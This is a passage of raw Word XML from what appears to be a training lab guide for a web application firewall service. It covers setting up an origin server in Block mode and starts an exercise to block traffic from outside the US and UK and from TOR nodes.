          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidR="04A078C7">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="59CF4DA7">
        <w:rPr/>
        <w:t>Select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="59CF4DA7">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="785696A9">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="501704BC">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Test Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="0451B6F4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="1E435EA2">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="00072E2A" w:rsidRDefault="00844F45" w14:paraId="222D99F2" w14:textId="6E5B4840">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">On the Select Mode step, select </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00844F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Block </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">and click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00844F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="21B1CB40" w:rsidRDefault="00844F45" w14:paraId="09ED0CA5" w14:textId="5C437E80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">Copy the </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="5D94711C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Address </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">under “Change </w:t>
      </w:r>
      <w:r w:rsidR="51936F19">
        <w:rPr/>
        <w:t xml:space="preserve">A Record </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">To” and </w:t>
      </w:r>
      <w:r w:rsidR="4A1ABD06">
        <w:rPr/>
        <w:t xml:space="preserve">save it somewhere like notepad or just write it down </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="4A1ABD06">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>😊</w:t>
      </w:r>
      <w:r w:rsidR="4A1ABD06">
        <w:rPr/>
        <w:t xml:space="preserve">  because you will need it in a few minutes.  Then </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00844F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="482C56DC" w:rsidP="21B1CB40" w:rsidRDefault="482C56DC" w14:paraId="5F29B43A" w14:textId="516E2EF6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="482C56DC">
        <w:drawing>
          <wp:inline wp14:editId="71514DFF" wp14:anchorId="312D5F3A">
            <wp:extent cx="2895600" cy="1726223"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1947178644" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2b23d9af144748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95600" cy="1726223"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="699639B3" w:rsidRDefault="0E0CF8B7" w14:paraId="3E50BBD0" w14:textId="6CF7F18A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0E0CF8B7">
        <w:rPr/>
        <w:t xml:space="preserve">View the </w:t>
      </w:r>
      <w:r w:rsidR="1A3EC13C">
        <w:rPr/>
        <w:t>backend/origin server, make sure it is “In Service” with a green check</w:t>
      </w:r>
      <w:r w:rsidR="1A3EC13C">
        <w:rPr/>
        <w:t>mark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="21B1CB40" w:rsidRDefault="0E0CF8B7" w14:paraId="6CCEFAF9" w14:textId="583A2656">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidR="68E98533">
        <w:drawing>
          <wp:inline wp14:editId="6C3DC136" wp14:anchorId="6BAA6E9D">
            <wp:extent cx="4838698" cy="1411288"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1338257135" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Ra9d2d54003a74d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38698" cy="1411288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="590AD905" w14:textId="70CA1534">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="239ABB88" w14:textId="7834A6DF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="699639B3" w:rsidRDefault="2E6AE2D5" w14:paraId="64BA14A6" w14:textId="65EC8A7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="59C4101A" w:rsidR="2E6AE2D5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Wait </w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="7C1471E0">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">about </w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="393BDE01">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="7C1471E0">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
      <w:r w:rsidR="7C1471E0">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:rPr/>
        <w:t>until the configuration has synced</w:t>
      </w:r>
      <w:r w:rsidR="0A913DC5">
        <w:rPr/>
        <w:t xml:space="preserve"> to all the WAFaaS datacenters in your global region. </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1360C599">
        <w:drawing>
          <wp:inline wp14:editId="375B1E85" wp14:anchorId="40D98FCD">
            <wp:extent cx="4876802" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1665211711" name="Picture 1665211711" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1665211711"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rde0755db51f94e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76802" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FEADC78" w:rsidP="21B1CB40" w:rsidRDefault="1FEADC78" w14:paraId="3005F8DB" w14:textId="113AA25B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="222CE8B0">
        <w:rPr/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="419C25CE">
        <w:rPr/>
        <w:t xml:space="preserve">rowse to </w:t>
      </w:r>
      <w:r w:rsidR="7911D2BB">
        <w:rPr/>
        <w:t xml:space="preserve">your unique </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="2FAE2CCE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="2FAE2CCE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r w:rsidR="419C25CE">
        <w:rPr/>
        <w:t>that you copied</w:t>
      </w:r>
      <w:r w:rsidR="1865DC8D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5D938559">
        <w:rPr/>
        <w:t xml:space="preserve">earlier </w:t>
      </w:r>
      <w:r w:rsidR="1865DC8D">
        <w:rPr/>
        <w:t>(e.g.</w:t>
      </w:r>
      <w:r w:rsidR="1865DC8D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Ra5f73baa72c54baa">
        <w:r w:rsidRPr="21B1CB40" w:rsidR="59C3E3B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://</w:t>
        </w:r>
        <w:r w:rsidRPr="21B1CB40" w:rsidR="59C3E3B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>141.193.180.136</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="59C3E3B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and make sure the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="1A6DFF5C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">web site </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads.  Congratulations on making it this far!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3372C4DA" w:rsidP="1FEADC78" w:rsidRDefault="3372C4DA" w14:paraId="3CB86701" w14:textId="3540A91F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3372C4DA">
        <w:drawing>
          <wp:inline wp14:editId="412DAE2D" wp14:anchorId="203C39A0">
            <wp:extent cx="581025" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1163637750" name="" descr="Stop photos, royalty-free images, graphics, vectors &amp; videos | Adobe Stock" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R5b304c43d3b44d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025" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="7B06AB01">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Please </w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="20EA645D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">let the instructor know you have reached this point. </w:t>
      </w:r>
      <w:r w:rsidR="20EA645D">
        <w:drawing>
          <wp:inline wp14:editId="3ADCC4C7" wp14:anchorId="57C94A77">
            <wp:extent cx="523875" cy="521132"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1187377551" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R0720cb91a8c143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3875" cy="521132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="7F15C254" w14:textId="4AF4EA87">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="513E8630" w14:textId="7A2C4836">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Customer Requested Configurat</w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:t>ion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="450DB56D" w14:textId="094B55F6"/>
    <w:p w:rsidR="00E90E4D" w:rsidP="00E90E4D" w:rsidRDefault="00E90E4D" w14:paraId="4FCA761C" w14:textId="0B46A396">
      <w:r w:rsidR="439C583C">
        <w:rPr/>
        <w:t>Cont</w:t>
      </w:r>
      <w:r w:rsidR="06096C9B">
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="439C583C">
        <w:rPr/>
        <w:t xml:space="preserve">uing on with our imaginary </w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00E90E4D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="19B85AC4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>roof-of-Concept</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="5BB4D0EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5BB4D0EA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="21B1CB40" w:rsidR="00E90E4D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t xml:space="preserve">WAF-as-a-Service, your </w:t>
      </w:r>
      <w:r w:rsidR="44775E31">
        <w:rPr/>
        <w:t xml:space="preserve">imaginary </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t xml:space="preserve">customer has </w:t>
      </w:r>
      <w:r w:rsidR="56DC7E6B">
        <w:rPr/>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t>requested the following</w:t>
      </w:r>
      <w:r w:rsidR="14A37FED">
        <w:rPr/>
        <w:t xml:space="preserve"> security configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="699639B3" w:rsidRDefault="699639B3" w14:paraId="44EA3723" w14:textId="281939A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidR="40FF972A">
        <w:rPr/>
        <w:t>Request # 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32965056" w:rsidP="32965056" w:rsidRDefault="32965056" w14:paraId="058D0EA2" w14:textId="5623397B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E90E4D" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="294EECE8" w14:textId="135776DB">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>I only do business with US and UK. Can you block all other countries? I also want to block TOR nodes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and anonymous proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="4752BFD6" w14:textId="341931F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="15E0CB9B">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="32965056" w:rsidRDefault="007D01EA" w14:paraId="6EDB2B4A" w14:textId="1C4A82B9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32965056" w:rsidR="7A98A0B1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Look</w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the available components in WAFaaS to see what would help block web requests outside of the US and UK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="68991AB6" w14:textId="637133B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="37C75D7D" w14:textId="5CE3FAEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="25BE37B5" w14:textId="4072B7E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>IP Address Geolocation</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="1586DAB5">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1586DAB5" w:rsidP="21B1CB40" w:rsidRDefault="1586DAB5" w14:paraId="63C6D1E2" w14:textId="52608122">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="1586DAB5">
        <w:drawing>
          <wp:inline wp14:editId="0F58C2EF" wp14:anchorId="19A91872">
            <wp:extent cx="4791145" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="420279602" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R4a38cf861c7a4f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91145" cy="2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="59849F4E" w14:textId="3568D784">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">In the Geo IP Filter card, move all countries </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
